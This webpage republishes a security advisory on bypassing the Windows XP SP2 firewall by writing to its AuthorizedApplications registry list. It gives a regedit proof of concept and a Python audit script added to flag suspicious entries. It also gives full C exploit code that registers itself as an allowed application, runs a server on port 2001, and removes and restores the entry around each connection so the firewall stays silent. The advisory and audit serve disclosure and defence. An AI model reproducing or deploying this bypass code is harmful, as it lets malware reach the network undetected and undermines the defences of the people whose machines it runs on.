There is a technique by which the Windows XP Service Pack 2 firewall can be bypassed.
The technique is nothing more than a vulnerability found in the Windows XP SP2 firewall.
It is explained here in detail, together with the exploit code.
Windows XP Firewall Bypassing (Registry Based) :-
Microsoft Windows XP SP2 comes bundled with a firewall. Direct access to the firewall's registry keys allows a local attacker to bypass the firewall's blocking list and lets a malicious program connect to the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip
Vulnerable Systems :-
* Microsoft Windows XP SP2
The Windows XP SP2 firewall keeps its list of allowed programs in the registry, and that list is not properly protected against modification by a malicious local user.
If an attacker adds a new value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, the attacker's malware or Trojan can connect to the Internet without the firewall raising a warning.
Proof of Concept :-
Launch regedit.exe and navigate to the key at the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
Add a new string value such as this one (the value name is the program path; the data is path:scope:state:display name):
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
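A defender reviewing this list wants to spot exactly the kind of entry the proof of concept adds. The following audit routine is an added example, not part of the original advisory: it parses values in the path:scope:state:display-name format shown above (splitting from the right, because the path itself contains a colon) and flags enabled entries whose value name does not match the embedded path or whose program lives outside the Windows and Program Files directories. The registry contents are a constructed sample dictionary, so it runs offline; on a real host the dictionary would be filled from the List key.

```python
"""Audit AuthorizedApplications\\List values (added example, not from the advisory)."""
from typing import NamedTuple


class AuthorizedApp(NamedTuple):
    path: str      # full path of the allowed program
    scope: str     # "*" means any remote address
    state: str     # "Enabled" or "Disabled"
    display: str   # name shown in the firewall UI


def parse_entry(value: str) -> AuthorizedApp:
    # Format: <path>:<scope>:<state>:<display name>.  The path contains its own
    # drive-letter colon ("C:\..."), so split only the last three fields.
    parts = value.rsplit(":", 3)
    if len(parts) != 4:
        raise ValueError(f"malformed AuthorizedApplications value: {value!r}")
    return AuthorizedApp(*parts)


# Locations a legitimately installed program is expected to live under (assumption).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")


def audit(values: dict) -> list:
    """Return (value_name, reason) pairs for enabled entries that deserve review."""
    findings = []
    for name, raw in values.items():
        try:
            app = parse_entry(raw)
        except ValueError as exc:
            findings.append((name, str(exc)))
            continue
        if app.state.lower() != "enabled":
            continue                      # disabled entries open nothing
        if name.lower() != app.path.lower():
            findings.append((name, "value name does not match embedded path"))
        if not app.path.lower().startswith(TRUSTED_PREFIXES):
            findings.append((name, f"enabled exception for untrusted location {app.path}"))
    return findings


# Constructed sample of the List key: one stock entry, the PoC entry, one disabled entry.
SAMPLE_LIST = {
    r"C:\Program Files\Messenger\msmsgs.exe":
        r"C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger",
    r"C:\chat.exe": r"C:\chat.exe:*:Enabled:chat",
    r"C:\old.exe": r"C:\old.exe:*:Disabled:old",
}

if __name__ == "__main__":
    for value_name, reason in audit(SAMPLE_LIST):
        print(f"{value_name}: {reason}")
```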
Exploit :-
```c
#include <windows.h>
#include <ezsocket.h>   /* author's own socket wrapper: ezsocket, ezclose_socket, ezsocket_exit */
#include <conio.h>
#include <stdio.h>
#include <string.h>
#include "Shlwapi.h"

int main(int argc, char *argv[])
{
    char buffer[1024];
    char filename[1024];
    char regvalue[1024 + 64];   /* "<path>:*:Enabled:bugg" */
    HKEY hKey;
    int temp, sockfd, new_fd, fd_size;
    struct sockaddr_in remote_addr;

    /* The program's own full path is used both as the value name and as the path field */
    GetModuleFileName(NULL, filename, sizeof(filename));
    strcpy(regvalue, filename);
    strcat(regvalue, ":*:Enabled:");
    strcat(regvalue, "bugg");

    /* Open the firewall's authorized-applications list for writing */
    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                     "SYSTEM\\CurrentControlSet\\Services"
                     "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile"
                     "\\AuthorizedApplications\\List",
                     0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
        fprintf(stderr, "RegOpenKeyEx failed\n");
        return 1;
    }
    /* Register this program as an enabled exception (REG_SZ length includes the NUL) */
    RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)regvalue, (DWORD)strlen(regvalue) + 1);

    fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
    fprintf(stdout, " This is not trojan \n");
    fprintf(stdout, " Opened port is :2001 \n");
    fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
    fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
    Sleep(3000);   /* Win32 Sleep() takes milliseconds */

    if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
        return 0;

    for (;;) {
        /* The exception is removed while the server blocks in accept() and restored after each client */
        RegDeleteValue(hKey, filename);
        fd_size = sizeof(struct sockaddr_in);
        if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1) {
            perror("accept");
            continue;
        }
        temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
        fprintf(stdout, "Sent: Hello World\r\n");
        /* Leave room for the terminator and guard against a failed recv() */
        temp = recv(new_fd, buffer, sizeof(buffer) - 1, 0);
        if (temp < 0)
            temp = 0;
        buffer[temp] = '\0';
        fprintf(stdout, "Received: %s\r\n", buffer);
        ezclose_socket(new_fd);
        /* Re-add the prepared firewall entry (not the received data) */
        RegSetValueEx(hKey, filename, 0, REG_SZ, (const BYTE *)regvalue, (DWORD)strlen(regvalue) + 1);
        if (!strcmp(buffer, "quit"))
            break;
    }
    RegCloseKey(hKey);
    ezsocket_exit();
    return 0;
}
/* EoF */
```